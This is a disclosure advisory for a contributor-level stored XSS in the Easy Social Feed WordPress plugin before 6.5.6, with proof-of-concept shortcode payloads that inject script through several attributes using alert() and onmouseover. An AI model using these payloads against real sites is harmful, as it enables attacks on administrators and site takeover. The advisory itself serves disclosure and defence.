WordPress Plugin Vulnerabilities
Easy Social Feed < 6.5.6 - Contributor+ Stored XSS
Description
The plugin does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin
Proof of Concept
Attributes fb_appid and locale (fixed in 6.5.4): [efb_likebox fb_appid='1234"; alert(/fb_appid/); asd ="' locale='1234"; alert(/locale/); asd ="'] Attribute animate_effect: [efb_likebox animate_effect='1234" onmouseover="alert(/animate_effect/)" style="height: 50px; border-style: solid" "'] Attribute fanpage_url: [efb_likebox fanpage_url='http://example.com/awesome/page/" onmouseover=alert("fanpage_url") style="height: 50px; border-style: solid" "'] Attribute box_width: [efb_likebox box_width='1234" onmouseover="alert(/box_width/)" style="height: 50px; border-style: solid" "'] Attribute box_height: [efb_likebox box_height='1234" onmouseover="alert(/box_height/)" style="height: 50px; border-style: solid" "']
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
Miscellaneous
Original Researcher
Dmitrii Ignatyev
Submitter
Dmitrii Ignatyev
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2024-03-27 (about 1 months ago)
Added
2024-03-27 (about 1 months ago)
Last Updated
2024-04-12 (about 1 months ago)